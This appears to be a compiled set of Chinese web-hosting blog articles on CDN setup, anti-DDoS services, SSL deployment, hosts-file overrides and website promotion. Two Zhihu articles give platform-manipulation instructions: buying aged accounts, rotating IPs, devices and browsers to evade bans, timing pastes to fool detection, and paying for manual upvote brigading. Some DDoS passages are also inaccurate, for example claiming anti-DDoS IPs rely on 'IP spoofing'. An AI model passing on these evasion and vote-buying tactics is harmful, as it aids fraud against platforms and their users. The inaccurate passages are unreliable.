添加完规则后,我们要把不缓存的规则提升至最优先级,否则全缓存规则会覆盖掉不缓存的规则,这样就失效了。顶到最上提供最优先级别即可。 #### 如何利用高防IP防御端口 速度网络高防IP支持防御网站业务和非网站业务,而非网站业务支持转发防御IP及非标准端口。 下面我们来说下操作步骤: 登陆速度网络后台-高防IP-非网站防护(传送门) 添加IP转发,如下图 即可完成端口转发防护。 #### 如何区分是裸金属还是云服务器 裸金属服务和云服务器之间的主要区别在于其性质和适用场景。以下是它们的主要区别: 性质:裸金属服务是物理机直接提供计算和存储资源,而云服务是通过虚拟化技术将物理机资源分成多个虚拟资源,然后根据需求分配给用户。 隔离:裸金属服务提供的是物理上的隔离,数据在物理上严格隔离。而云服务器则通过虚拟化技术实现隔离,虽然每个用户在使用上是独立的,但实际上是多用户共享同一组物理资源。 资源弹性:裸金属服务的资源是固定的,无法根据需求进行弹性调整。而云服务器可以根据用户需求进行弹性调整,可以根据业务需求进行动态调整。 适用场景:裸金属服务适用于对安全隔离和性能有较高要求的应用场景,如银行、金融、证券等行业,或高性能计算、大数据等需要处理大量数据的场景。云服务器则适用于各种业务场景,特别是需要灵活的资源调整和较低的成本的场景。 综上所述,裸金属服务和云服务器各有其优点和适用场景,用户应根据自身业务需求来选择使用哪种服务。 #### 如何在不花钱的情况下免费推广企业网站 作为一个新站没钱没资源怎么免费有效的推广自己的网站一直是大家梦寐以求的。主机吧在这里简单介绍下几种不花钱的推广方式,希望对您有所帮助! 免费推广自己网站的方法 1、搜索引擎推广: 目前主流搜索引擎(百度、搜狗、360)均提供网页免费收录和检索,因此您需要学习一些搜索引擎优化知识进行,注意提交网站到搜索引擎都是免费的入口; 2、网络分类目录: 把网站提交给网址导航、行业信息网等免费资源,也可以达到一定的免费网络推广效果;不过目前网站目录都倒得差不多了,提供免费收录的网站估计没几个了。 3、博客营销: 开通免费的第三方博客平台,比如新浪博客、QQ空间等,转发网站文章图片等带上网址也会有不错的效果。 4、EMAIL营销: EMAIL不仅仅是用来收发邮件的,你可以常常的提供最新产品信息、折扣信息,或者哪怕仅仅是问候,不过前提是要经过客户的许可,且勿扰民; 5、软文营销: 经常的撰写有价值的文章,有意无意的提到推荐贵公司产品,发表在潜在客户混杂的论坛网站上; 6、问答营销: 百度知道,知呼等社区上,是不是有很多专业知识的问题呢?真诚的帮助他们,后顺带推荐一下公司产品,没人会介意你捎带的网站推广行为的; 7、B2B网站信息发布: 免费发布信息到B2B平台上,但见过许多采用这种免费推广网站的企业,产品介绍错误百出,所选网站广告横飞,实在有点损害企业形象,因此慎选提供提供免费网络推广的网站; 8、病毒性推广: 病毒性推广也是口碑营销,好的功能或服务的创意,通过IM聊天工具,电子邮件等发送给朋友,朋友再发给朋友,无限扩大的推广效果就呈现了,这可能是效果最好的免费网络推广方法,但前提病毒有点创意,或有价值。 其他一些免费推广方式: 1、通过QQ推广 在QQ中多加些好友,通过向好友发送网站的网址,以达到推广网站的目的。在QQ个性签名中都可以加入你网站的名称和网址。还可通过加入QQ群,发送群消息来推广网站。 2、自媒体体平台推广 现在自媒体平台这么多,如企鹅号、搜狐号、今日头条等,在不影用户体验的情况下悄悄带上网址也是可以的。3、友情链接推广 找和你网站内容相近的网站或论坛来交换友情链接。 4、论坛推广 到各个论坛中注册个用户名,发些贴子带上你网站的网址。注册成功就可以发网站推广的贴子了。 5、贴吧推广 过去在百度贴吧可以发网址,但现在百度贴吧对外链进行封杀,是无法发网址的,否则你的贴子被删除还要封你的账户。你可以把你网站的名称和网址做成一个图片,发图片是不会被百度查出来的。还有你的头像也可以改成图片,图片上加你的网址和网站名称。 6、微信推广这是目前最流行的,据说流量很高,把网站上的视频图片分享朋友圈,可以得到不错的流量。以上就是一些简单的免费获取网站流量的方法,当然我们不必一一做完,只要把一样免费推广方式做精,就可以得到不错的效果,比如主机吧某位客户就利用百度知道推广,每天从百度知道获取几百的精准流量。几百个访客只要有十几个给你买东西,是不是就赚发了呢?免费推广方法很多,主机吧没能写全,我们要记住,免费推广生效是没有收费推广快的,但却是最长久的,所以坚持吧! #### 如何在百度云加速CDN节点上部署自己的SSL证书 经常有站长遇到网站接入百度云加速后,显示:此网站无法提供安全连接、使用了不受支持的协议。 原因是用户并没有在百度云加速上部署自己的SSL证书。   今天我们就来教大家如何在百度云加速上部署好自己的SSL证书,首先我们进入SSL证书管理,也就是你购买SSL证书那里,把证书文件下载来 这里我们下载Nginx类型的   然后得到以下两个文件 然后们进入百度云加速,证书管理-证书列表-上传证书 把之前下载的两个证书文件用记录本打开,把后缀为.pem的文件内容复制到证书那,把后缀为.key的文件内容复制到私钥上,证书名随便写都可以,然后保存 确定后,再点部署 这样就完成了,如果访问出现重定向过多的话 那么我们进入安全功能,HTTPS加速,把半程加密调为全程加密即可。   #### 如何在知乎做推广引流 记得去年9月知乎有公开数据,知乎个人注册用户达到1亿,日活跃用户量达2600万,人均访问时长1小时,月浏览量180亿。知名度虽然没有百度知道有名,但在业界也是鼎鼎大名,而且知乎不仅流量大,用户质量也非常高。越来越多的行业机构和个人都热衷于到知乎做推广引流。其实,在知乎推广引流只需做好这三点就可以了。 高权重账号 在知乎的每一个注册用户都有一个PR(Person Rank),你的每一个操作都将直接影响你个人的PR 值。在回答的时候,答案顺序按赞同票数排序,赞同票数相同的情况下按个人PR值排序,同时隐藏被认为无效的答案。这在一定程度上过滤了相当的垃圾信息。 简言之,知乎内容展现和账号权重,投票机制相关。账号权重和账号注册时间,关注人多,回答质量相关,知乎投票机制包括点赞,收藏,喜欢,感谢,评论等。 所以,在知乎推广引流要使用高权重的账号。如果自己已有知乎账号,并且注册时间较早,且有一定基础可以直接拿来养号备用。也可以去网上购买老号,再绑定自己的手机。完善资料信息,关注一些话题,大号,点赞,评论一些相关内容。 注意一定要有养号的步骤而不是一拿过来就打广告。 账号级别高,回答数量多,在知乎的影响力是非常大的,所回答的问题所写的文章,就会被知乎收录。每个问答的点赞,感谢关注也等都有很多。 比如:这几个账号都是高权重账号,很多知乎大V 开live靠的也是高PR值和高质量内容。 相反,像这类的“三无”小号,(昵称乱码,没有头像,没有个人介绍,没有或极少关注问题,没有粉丝也没有去关注其他人,没有点赞,没有提问,没有回答,其实是N无了)。如果一上来就去做推广,基本就是死翘翘了。 找准推广位置 知乎对广告容忍度是比较高的,当然前提是你提供的是干货有价值的广告信息。通常可以在这些地方打广告。 1. 知乎昵称和个人介绍,直接取名就是广告,个人介绍那里可以留联系方式; 2. 回答内容直接放广告,文中或文末放微信号或二维码,不过初级账号不建议这样操作,容易封号; 3. 个人页面,比如封面图片加二维码或其他,个人简介处留联系方式,还可以放外部链接; 4. 除了提问,回答,发布文章,知乎还有一个发布想法,类似于微博,说说,在这里发布广告比较安全,如果你的粉丝关注者多,也能起到一定推广效果; 5. 头像,直接放联系方式或二维码,不过这种方法不建议,有点low 提供高质量内容 最后也是最重要的一点,在知乎推广引流,一定是要提供高质量的干货内容。 1. 如何选择问题,找问题之前要先对自己的目标用户进行画像,先要知道他/她会关注哪些话题,这样才能选择好问题。以做在线英语培训为例。 (1)直接搜索相关话题,到话题里检索问题,还有父话题,子话题,到话题里去找问题。 (2) 筛选潜力话题,要根据潜在客户的心理去找话题,要了解他们会关注哪些话题,然后在去回答。 做在线英语培训机构的企业,这个问题就是一个很好很有潜力的话题,如何选择在线英语培训机构会是你的潜在客户很关心很关注的问题,而且这个问题关注者,浏览量都不小,回答数不多只有8个,你去回答的话也不会被埋没在后面。 (3) 新手不建议去回答大话题。要尽量避开答案多,牛人多的问题,就算回答了也会在后面,会被淹没。回答体量中等偏上的问题,流量在几千到一万之间就比较合适,既没有很多牛人竞争,也有一定浏览量,潜在用户也能看到,等自己的账号有一定权重了再去回答热门的话题, (4)找准问题,掌握回答时机,在热度起来之前抢占先机,估计这个问题之后会不会有许多人回答、有大v参与,回答的早,初期有赞,才能不被大v的回答压的太下面。 2. 知乎回答的套路: (1)回答的是用户想知道的,他们所认为的干货, (2)有清晰的框架,逻辑要清楚,排版要美观,适合在手机端查看。 (3) 回答重点部分记得加粗,不要大段文字,一段不要超过4行。 (4) 文字和图片,表格相结合。 (5)广告部分能软性植入,如果不能就放到最好。 以这个问题为例, 有干货,逻辑清楚,标注一二三,回答重点部分记得加粗,有图片有表格,广告内容放最后,因为是机构账号,直接放链接也不会被删除。 当然,在知乎推广引流更重要的是要塑造个人品牌,知乎大V们可不是疯狂发广告的,大V们都是有血有肉的,所以除了关注行业相关问题,也要适当追热点,关注一些生活,兴趣爱好,情感类问题。 那么,在回答情感类问题要有一定文字功底,叙述故事化;观点类问题,表达个人观点能贴合知乎政治正确,比如人权第一,知识产权受保护这类;最最重要的是,知乎回答内容要逻辑自洽,不能出现逻辑漏洞。这样也能吸引一定粉丝量。 本文作者:格子匠 微信18670371796 #### 如何在知乎打广告而不被封号 其实知乎这个平台大家应该相当熟悉,肉很肥,但是很多人不知道怎么下嘴,我的群里也是经常有人叫嚣着逼乎药丸,动不动就封号,刚开始还会耐心的给他们做个封号原因排查,后来慢慢的也就听得多了,觉得厌烦了,今天把我玩知乎的经验分享出来,希望大家看完这篇文章不在看到下面这张图。知乎封号几个重要因素:第一:诱导用户,诱导的表现方式有很多种,我举个最常见的就是写完答案就把个人公众号留那,完事关注公众号送xxxx,这样的我个人是非常不推荐的,活不长,有存在的但是活不长,而且容易引起公愤。因为现在知乎很多用户对广告是非常反感的,个签留公众的他们都要举报一波,别说这种赤果果的广告了,除此之外还有诱导点赞以后才更新等等,更多详见官方说明(我在这里说最常见的,官方的东西一定要仔细读)。第二:经常有人说,我号刚注册啥都没干就被封了,这种我相信大多数硬广玩家经常遇到,是知乎针对你么,不是,给大家解释下为什么,知乎对设备和IP和手机号都是有要求的。如果你的这个设备之前有被封,那么我不推荐你在用这个设备去注册,还有一个就是手机号不是实名的,是一些虚拟号段或者流量卡注册的,这个不建议用来做知乎。IP:如果你的IP被封了以后,就不要用这个IP去注册了不然就会出现刚才所说的情况(注意:一个号一个IP,如果几个号都用一个IP,一个号被封,其他几个号也有可能遭殃)第三:前面有说道硬广,其实对这些人只想说,聪明反被聪明误,从长远角度来说这种广告没有任何价值,几乎不会有人添加(当然也看行业,有些领域只能硬广操作)如果说我们塑造个人品牌或者推广产品的话文笔还是要硬的,干货还是要多的,可以围绕产品去答题。第四:同行举报,同行互怼,和气生财这个我想大部分人都能做到,不过有些人还是不经意之间就犯了,在这里给大家说个例子,我一个朋友万粉的和另外一个万粉的怼起来了,对方先骂的人,然后他号就被封了,其实到万粉那种地步个人觉得没必要在惹事了。第五:就算前面的几点你都避免了,还有一点是无法避免的,就是我说引起公愤,这个本人亲测过,一些没啥权重的号,随手举报就能把答案删除,简单点理解就是大V想删你答案很简单,只需要叫几个朋友就可以把你的答案干掉,还有的就是叫水军来干你的号,都是有用的(知道了别用这个干坏事,恶意竞争会陷入死循环)。第六:为了不给别人留举报的把柄我是建议大家还是品牌词少出现为好,尽量用某代替,因为真心想要了解的不懂会私信你的。写答案的时候切记,不要以为当时没删以后就没事了,养成一个好的习惯才是最为重要的。封号因素说完了再说说删答案删答案最常见的就是广含有推广信息。和我上面说的几点也是有关系的,特别注意政治敏感这块千万别瞎BB,就算你成为一个大V碰了底线也不好使,该封还得封,知乎整顿那会,封了多少大V你们应该也有所耳闻。其实无论我们在哪里做推广都一样,违背法律的内容千万不能发,平台不可能为了你一个人冒着被整顿的风险。删答案:参照上面几点(第二点无视)封号和删答案是有一定的联系的,因为经常有人会发现,答案一连删几条,第一条的时候可能还没事,但是到第三条的时候就会被禁言。第五条可能就永久封了,这种基本都是引起同行或者公愤了,别人就是要搞你,你也没有办法的,所以前期猥琐发育,取悦大众尤为重要,不会取悦千万别得罪,把自己的脾气带上去,把苦逼的前期(1K粉丝之前)度过就可以不用担心这些了。避免同行就是别把答案直接刷到第一,你不死谁死,人家看你一个三无小号把答案顶到第一,随手就是一个举报的,猥琐发育,切记知乎正确引流玩法:第一:新号要用实名的手机号去注册(一卡一机一IP),资料补充完整名字这块借用一组数据来补充说明以上是封号频率较高的用户名,所以大家起名的时候要注意,不要直接在名字上加广告,不要顺手打出以上出现频率过高的名字(已重置是官方重置的不是自己起的)头像这块也有注意点:以下是封禁用户使用频率最高的50组头像,其中第一第二第四是50组中最高,也就是说不要用默认头像,上号就把资料补充了。(数据仅供参考)其他资料补充完毕以后,个人推荐去付费赞助一个LIVE或者一本付费书籍,这样会增加防封几率,完成了以上之后就是养号阶段养号阶段:所有资料补充完毕以后,养号建议养15天左右就可以用来回答问题了,养号期间要做的事,每天不同时段登录知乎,用来点赞浏览评论收藏,但是不要过于频繁一天建议点3-5个,其实这个并不难,知乎有很多大牛分享经验看看对自己也不是一件坏事,每天都需要这样做,最起码半个月。半个月以后就可以上浏览器回答问题了,因为很多人做知乎都是批量做的,又是在手机上养的号,如果在浏览器上不换IP的话也会有影响,第二个就是不要在同一个浏览器回答问题,电脑里多下载几个浏览器,每次登陆的时候重启下路由器,可以达到更换IP的效果。回答问题:这块除了我开头说的还有就是频率和回答时间,不要以为号养完了就可以一天回答几个问题不存在的,频率这块分两种一种是刷赞的和不刷赞的,不刷赞的你可以每天回答问题,而且不会被封,刷赞的你一两个月在回答一个问题(前期频率可以提高些。比如刚开始一星期,后来半个月,)除了频率就是回答时间,知乎会检测你这个回答用了多久,但是不会检测你有无删改,复制粘贴的时候要停留一段时间,不然秒封秒删,友情提示:刷的赞掉的话的话答案也容易被删知乎排名上分技巧除了以上封号因素,最常见的就是刷赞,其实对于刷赞这块还是比较有争议的,分两类:一种觉得处处留痕,不刷赞多回答问题,也能达到推广的效果,另外一个就是猛刷,刷到上面撸浏览器和app内流量。在浏览器内展现的规则大家可以看下,只展现排名前四的,也就是说你如果在第五浏览器内是不显示你的回答的,而且除了第一,其他的几个排名都显示app内查看。在这里呢我个人觉得刷必须要刷。如果是企业的话另说,原因是佛系推广的话周期长,而且做推广你总是会得罪一部分人,你的回答越多相对来说也就越危险,你不可能保证你的每篇文章都不出现品牌词和外链等。包括像淘宝客这些视为推广的词语,这样的出现频率多了人家举报成功的几率也就越大,刷就完事了。知乎刷赞量这个没有一个准确的标准,也都是根据自己的账号权重,不过刷赞(机刷和人工刷)一定要找个靠谱的人,不然你的号会死的很惨。个人推荐人工刷,人工刷的掉赞情况好些,而且人工有很多是自己的号,顺便来群里接单这样子。像他们这种号的权重也相对比机刷的号高,而且价格这块和机刷差不多的,刷赞的时候告诉他们一定要拉倒底部浏览超过40秒-60秒(官方只会检测停留时间,所以不用要求阅读)。不推荐机刷的原因:容易掉赞,容易封号(官方认定你刷赞就会把赞给你撤销掉,然后有几率封号,刷赞封号更多还是要看你的号权重,权重高的话可能会禁言删答案,低的话就直接GG。赞的量前期不要短时间刷很多,分时段,如果有条件配合浏览刚,但是基本都没这条件,没这条件就分时段的去刷赞,后面的话是可以直接刚的,被官方抓到也没事最多把你答案删了的。因为推广官方是默认的,前提是你对知乎有贡献确实帮到用户了,那判断你是否帮到用户自然和你的粉丝量和点赞收藏量有关的,抱着分享的态度去玩知乎我相信知乎也会回馈你财富,路很长,坑很多,共勉。有需要补充欢迎评论区留言或加我一起讨论。END作者微信公众号:98K社群 #### 如何实现被DDOS攻击自动切换高防CDN思路 最近有一小伙伴向主机吧反馈使用了百度云加速海外版后国内访问有些慢,还不如自己用使用的阿里云香港主机,想问主机吧有什么办法解决国内访问速度问题吗? 对于这个问题从CDN下手肯定是没办法了,因为百度云加速海外版的CDN节点是和cloudflare合作的,而cloudflare采用的是Anycast技术,虽然cloudflare本身是有香港节点的,但是只要是国内IP访问cloudflare节点都是会直接走美国洛杉矶线路,这也就导致了国内访问慢的问题,这个问题目前没有别的办法解决。 那么我们要如何加速呢?其实我们可以换一个想法,我们的香港服务器国内本身访问很快了,那直接把高防CDN当成一个临时防御用,在服务器被攻击死的时候再切成高防CDN防御,没攻击的时候再切回香港服务器,这样就彻底解决了速度和防御问题。 那么我们要如何实现自动切换呢? 我们需要给服务器弄两个IP,一个IP CDN回源用的,一个平时解析用的。如果是阿里云腾讯云之类的,购买负载均衡即可,具体操作大家研究研究了,懂点技术不难。 然后我们再把域名的DNS切换成支持宕机检测和切换功能的DNS服务商那,然后添加一条A记录服务器的IP当平时用,然后再添加一条高防CDN的cname记录当备用。 需要注意的是:高防CDN设置的回源IP一定不能跟你平时解析的IP同一个,这也是为何前面说的要两个IP的原因。 设置完后我们再设置DNS切换规则即可完成自动切换。 原理是当黑客攻击你的一个香港IP时,导致了IP进黑洞了,这个时候我们的DNS检测到这个IP不可用了,就会自动切换至高防CDN访问,而高防CDN回源的是另一个IP,并不影响你正常访问。等到被攻击的IP恢复后,又自动切回平时用的IP。实现被攻击快速切换防御,平时还可以走普通IP线路的目的。 想要实现这个目的要有两个IP和智能DNS,智能DNS国内很多,免费的都有,不过主机吧建议用收费的,功能要好些,比如DNS.la,就支持宕机检测,自动切换功能。 目前淘宝上很多高防CDN都是利用这个思路解决国内访问慢的问题,他们购买大量的阿里云香港云服务器做普通转发节点,平时的时候用来加速,等到被攻击了,就切成cloudflare防御,然后没攻击了再切回来,虽然被攻击的时候切成cloudflare会慢些,但是总比访问不了好,一般客户都是可以接受的。 #### 如何将ICP备案号添加到网页中 若您的备案审核通过,获取了备案编号,您需要联系网站设计人员,修改您的网站首页文件,添加这样一段HTML代码:(index.htm,index.html,index.asp,default.asp,index.php等),加入: <div align=center><a href="http://beian.miit.gov.cn/"; target=_blank>备案编号</a></div> 以主机吧为例,用的wordpress都是有底部模块修改的。 #### 如何应对DDOS攻击 应对DDoS攻击是保障网络安全和业务正常运行的重要工作。在这篇文章中,我们将介绍什么是DDoS攻击以及如何使用高防IP、高防CDN和高防服务器来应对。 DDoS攻击,也称分布式拒绝服务攻击,是一种最常见的网络攻击。其目的是通过向目标服务器发送大量的虚假请求或数据包,从而使其无法正常响应真实请求。这样,攻击者就可以通过破坏服务器的可用性来达到自己的目的,如窃取数据、勒索软件等。 为了应对DDoS攻击,我们可以采取以下三种措施: 高防IP 高防IP是指具有高防DDoS攻击的IP服务。这种服务可以将用户的请求通过多个节点和服务器进行分发,从而减轻DDoS攻击对单个服务器造成的压力。同时,高防IP还可以提供IP隐藏和防盗功能,有效保护用户隐私和业务安全。 高防CDN 高防CDN是指具有高防DDoS攻击的CDN服务。CDN服务可以将网站内容分布在多个加速节点上,从而加快网站访问速度和响应时间。而高防CDN则可以在攻击发生时,将攻击流量引导至安全节点,从而保护源站的安全。通过高防CDN,企业可以轻松抵御大规模DDoS攻击,并确保业务的正常运行。 高防服务器 高防服务器是指具有高防DDoS攻击的服务器设备。这种服务器可以通过硬件配置、网络设置等多种手段来抵御DDoS攻击。企业可以选择具有充足防御能力的服务器,并定期检查其防御设备是否合格。此外,还需关注服务器的处理能力、存储空间和网络带宽等因素,以确保服务器能够满足业务的需求。 在实际操作中,我们可以结合使用高防IP、高防CDN和高防服务器来应对DDoS攻击。例如,使用高防CDN可以在前线抵御大部分的DDoS攻击,而高防IP则可以在CDN无法承受攻击时,提供进一步的防护。当攻击规模特别大时,高防服务器则可以作为最后一道防线,保护业务安全。 以某企业在面对DDoS攻击时的实践为例,该企业采用了高防IP、高防CDN和高防服务器共同防护的方法,取得了显著的效果。该企业在遭受攻击时,将请求流量引导至高防CDN的安全节点上,同时启用高防IP对请求进行分发和保护。最终,在高防IP、高防CDN和高防服务器的共同防护下,企业成功抵御了攻击,保障了业务的正常运行。 在面对DDoS攻击时,应对措施需要因业务需求而异。因此,建议企业在选择高防IP、高防CDN和高防服务器时,要充分考虑自身业务需求、预算以及防护能力等因素,选择最适合自己的防御方案。此外,还需关注供应商的服务质量、抗DDoS攻击规模、防御技术以及后续的防护升级等方面,确保防护效果的最大化。 总之,应对DDoS攻击是保障网络安全和业务正常运行的重要工作,需要采取多种措施来共同防护。通过使用高防IP、高防CDN和高防服务器,企业可以有效地抵御DDoS攻击,并确保业务的正常运行。在未来,随着网络攻击手段的不断升级和变化,我们需密切关注新型DDoS攻击的特点和趋势,及时调整防护策略,保障网络安全和业务运行的安全可靠。 #### 如何应对高频DDOS攻击 随着互联网的普及和发展,网络安全问题日益突出,其中DDoS攻击是一种最常见的网络攻击。DDoS攻击的原理是通过向目标服务器发送大量的无效请求或数据包,从而使其无法正常响应真实请求。这种攻击非常危险,可以导致网站瘫痪、业务中断等严重后果。为了保护企业和个人的网络财产和数据安全,我们需要采取一些有效的措施来防止DDoS攻击的影响。 在本文中,我们将介绍如何应对高频DDoS攻击,包含以下方面的内容: 介绍DDoS攻击的背景和影响。 高防CDN的原理和作用,以及选择高防CDN的重要性。 高防IP的原理和作用,以及选择高防IP的重要性。 高防服务器的原理和作用,以及选择高防服务器的重要性。 应对策略,包括网络安全措施、服务器选择、操作系统升级等方面。 总结,强调高防措施的重要性,并鼓励读者积极采取措施保护自己的网络安全。 一、介绍DDoS攻击的背景和影响 DDoS攻击是一种最常见的网络攻击,其目的是通过向目标服务器发送大量的无效请求或数据包,从而使其无法正常响应真实请求。DDoS攻击的影响非常严重,可以导致网站瘫痪、业务中断等后果,给企业和个人的利益带来巨大损失。 二、高防CDN的原理和作用,以及选择高防CDN的重要性 高防CDN是一种内容分发网络服务,其原理是将网站的内容缓存到多个服务器节点上,以提高网站的访问速度和可用性。高防CDN的作用是减轻DDoS攻击的影响,通过将流量分散到多个服务器节点上,减少单一服务器的负载,从而降低受到DDoS攻击的风险。选择高防CDN时需要考虑其节点分布、节点数量、节点带宽等因素,以确保服务的质量和稳定性。 三、高防IP的原理和作用,以及选择高防IP的重要性 高防IP是一种网络安全服务,其原理是将多个服务器放在同一个IP地址下,通过IP地址欺骗技术来防止DDoS攻击。高防IP的作用是减轻DDoS攻击的影响,通过将流量分散到多个服务器上,减少单一服务器的负载,从而降低受到DDoS攻击的风险。选择高防IP时需要考虑其防护能力、带宽、服务质量等因素,以确保服务的质量和稳定性。 四、高防服务器的原理和作用,以及选择高防服务器的重要性 高防服务器是一种网络安全设备,其原理是通过硬件设备来防止DDoS攻击。高防服务器的作用是减轻DDoS攻击的影响,通过硬件设备来防止DDoS攻击,从而降低受到DDoS攻击的风险。选择高防服务器时需要考虑其防护能力、带宽、机房位置等因素,以确保服务的质量和稳定性。 五、应对策略 除了使用高防CDN、高防IP和高防服务器等安全设备外,我们还可以采取以下应对策略来减轻DDoS攻击的影响: 网络安全措施:企业和个人应该加强网络安全意识,定期更新软件和系统,设置防火墙等措施来防止DDoS攻击。 服务器选择:选择信誉良好的服务器提供商,确保服务器的稳定性和可用性。 操作系统升级:定期升级操作系统和应用程序,以修复漏洞和BUG,减少受到攻击的可能性。 六、总结 本文介绍了如何应对高频DDoS攻击,包含高防CDN、高防IP和高防服务器等安全设备的作用和选择方法,以及应对策略等方面内容。企业和个人应该加强对网络安全的认识和采取相应的安全措施,以保障自己的网络财产和数据安全。 #### 如何强制域名解析某个IP方法 Windows系统利用HOST文件强制域名解析某个IP Host文件的位置: 进入windows系统计算机管理,HOST文件位于系统盘 C:\Windows\System32\drivers\etc 中。 右键用记事本打开,然后在后面加上一条记录即可。 比如主机吧想把域名zhujib.com 解析到 58.215.98.35 填写方法下图:   然后保存即可。IP和域名中间要有个空格。 Host文件强制域名解析妙用之处很多 比如用了百度云加速CDN的用户有时反馈网站变慢或者522、502之类的打开不状态,那我们可以本地电脑强制回原服务器IP,看原服务器是否出现异常,只需按以上方法把IP换成你的服务器IP,域名换成自己的就可以了。 比如网站想换服务器,但是为了不影响正常访问,可以先本地强制域名解析至新服务器IP,测试网站可以正常使用了,再做域名更换解析处理。 比如域名解析生效慢,猴急的站长想快点先看到新解析的IP效果,也可以本地强制解析至新IP测试。 比如用了CDN的网站,想本地测试某个CDN节点IP是否正常,速度如何的,也可以本地强制解析至这个节点IP查看。 比如本地的DNS无法正常解析域名IP,也可以强制域名解析至服务器IP。     #### 如何快速判断服务器是否遭受CC攻击 CC攻击的表现 如何快速判断服务器是否遭受CC攻击首先需要了解一下CC攻击的原理,CC攻击是DDoS攻击的其中一种,DDoS攻击方式还有:ICMP Flood、UDP Flood、NTP Flood... CC攻击是目前应用层攻击的主要手段之一,借助代理服务器生成指向目标系统的合法请求,实现伪装和DDoS。我们都有这样的体验,访问一个静态页面,即使人多也不需要太长时间,但如果在高峰期访问论坛、贴吧等,那就很慢了,因为服务器系统需要到数据库中判断访问者否有读帖、发言等权限。访问的人越多,论坛的页面越多,数据库压力就越大,被访问的频率也越高,占用的系统资源也就相当可观。 CC攻击就充分利用了这个特点,模拟多个正常用户不停地访问如论坛这些需要大量数据操作的页面,造成服务器资源的浪费,CPU长时间处于100%,永远都有处理不完的请求,网络拥塞,正常访问被中止。这种攻击技术性含量高,见不到真实源IP,见不到特别大的异常流量,但服务器就是无法进行正常连接。 之所以选择代理服务器是因为代理可以有效地隐藏自己的身份,也可以绕开防火墙,因为基本上所有的防火墙都会检测并发的TCP/IP连接数目,超过一定数目一定频率就会被认为是Connection-Flood。当然也可以使用肉鸡来发动CC攻击,攻击者使用CC攻击软件控制大量肉鸡发动攻击,肉鸡可以模拟正常用户访问网站的请求伪造成合法数据包,相比前者来说更难防御。 CC攻击是针对Web服务在第七层协议发起的攻击,在越上层协议上发动DDoS攻击越难以防御,上层协议与业务关联愈加紧密,防御系统面临的情况也会更复杂。比如CC攻击中最重要的方式之一HTTP Flood,不仅会直接导致被攻击的Web前端响应缓慢,对承载的业务造成致命的影响,还可能会引起连锁反应,间接攻击到后端的Java等业务层逻辑以及更后端的数据库服务。 由于CC攻击成本低、威力大,所以互联网上80%的DDoS攻击都是CC攻击。 CC攻击的服务器的主要体现在:带宽资源严重被消耗,网站瘫痪;CPU、内存利用率飙升,主机瘫痪;瞬间快速打击,无法快速响应。所以一但出现以上情况基本都是CC攻击了。 对付CC攻击我们推荐使用百度云加速进行安全防护,百度云加速应对CC攻击效果非常好,而且价格相比其它防护厂商便宜很多,是国内中小站长最常用的防护防护服务之一。 #### 如何快速接入百度云加速CDN 随着互联网用户不断增长,许多网站因用户访问过多会出现卡慢的现象,升级服务器配置需要投入一笔不菲的费用,除了升级配置,站长可以选择给网站部署CDN加速。 CDN(Content Delivery Network,内容分发网络)是构建在现有互联网基础之上的一层智能虚拟网络,通过在网络各处部署节点服务器,实现将源站内容分发至全国所有节点,使用户可以就近获得所需的内容。接入CDN可以提升用户访问体验、降低回源带宽费用、降低源站资源投入以及提升安全性等。 百度云加速作为安全CDN产品,为网站提供加速的同时,还提供一系列安全方面的服务: 将攻击拦截在CDN节点:攻击不会回到源站; 降低源站防护成本:包含普通攻击防护设备的投入以及攻击带宽成本; 大流量攻击的清洗成本:由于隐藏了源站,流量攻击都在CDN节点被拦截和清洗,用户无需自建成本极高的防护方案; 安全工程能力的积累:安全攻防工程能力的建设并非一日之功,除了完善理论基础外,还需要大量的实践检验以及情报积累,这些对于一般的企业而言,都是成本极高的投入。 那么如何快速的将域名接入CDN呢?本篇以云加速为例,通过详述 CDN 接入配置,以及每个步骤常遇到的问题进行解惑,让客户可以顺利接入CDN。 CDN接入及验证      一、接入前准备 配置CDN之前首先需要有一个已备案的域名,如果您使用的是海外加速业务,此域名可不备案。 二、开通CDN服务 在使用CDN服务前,需要前往您所使用的产品页面进行注册以及实名认证。使用百度账号或者百度推广账号注册/登录http://su.baidu.com ,完成注册/登录后,根据要求进行实名认证后,前往控制台进行域名接入。 三、域名接入 以云加速为例:进入配置后,输入您的域名,请注意这里必须要填写主域名,比如域名为 www.example.com,则主域为 example.com。 此处需要选择接入方式,云加速接入支持NS方式(默认推荐)和CNAME接入方式,下面就两种接入方式进行介绍: 1、NS方式接入:NS方式是将域名解析托管在云加速上,此种方式配置最为简单,加上云加速DNS拥有更加速智能和安全的解析方案,让您的域名管理起来更加轻松、高效,是默认推荐的方式。 具体操作如下: 在输入域名并选择NS方式点击下一步后,会对已添加的域名做一些常规检查,比如是否备案、网站是否正常访问,是否在云加速的黑名单以内,并扫描您域名的历史子域名记录进行系统直接添加。 如果列表中没有您要添加的子域,则可点击「添加子域名」,列表中会新增一条记录: 类型选择:默认是A记录,即IP地址记录,用于把域名指向一个IP地址。同时可以支持CNAME记录,即别名记录,用于把域名指向另一个域名。 1)子域名:这里填写您需要解析的子域名。Eg:要添加的域名为 www.example.com,则这里写:www 2)  线路:这里是将来访的用户按照运营商进行划分,目前可以分为电信、联通、移动、海外、默认。 3)  指向:用户真实服务器的IP地址,如果是cname回源方式,这里填写用户的回源域名。 4)  TTL:生存时间,就是一条域名解析记录在DNS服务器中的存留时间,通常选择「自动」。 完成上述配置后点击创建按钮完成该条解析配置的创建工作。 获取到图中NS记录值后,点击设置完成,然后前往域名注册平台修改NS指向即可。 如何在第三方域名运营商修改DNS 到您的域名商网站上修改DNS,每个域名商的面板都不一样,但你只要看见有“DNS修改”字样的链接点开就没错。以下为阿里云DNS修改页面,将域名的DNS修改为XXXX.ns.yunjiasu.com 2、CNAME方式接入:CNAME是通过第三方(一般为购买域名的厂商)域名运营商添加给定的CNAME记录来进行接入的方案。此种方式每添加或修改一个子域名都要在第三方域名运营商进行同步修改,因此没有NS方式方便,同时DNS解析的速度、智能选路以及安全性等都依赖于第三方DNS,对业务的优化带来一定的不确定性。 具体操作如下: 图中TXT记录是一条域名激活记录,通过在您DNS上配置该记录来激活您的云加速的所有配置。如之前所述一样,如果域名不激活,那么一段时间后会被系统清理掉。 点击“复制”,将CNAME记录复制以便在域名商那边修改解析指向。 如何在第三方域名运营商配置CNAME解析 到您的域名商的网站上修改域名解析,每个域名商的面板都不一样,但你只要看见有“解析设置”字样的链接点开就没错。以下为阿里云域名解析设置: 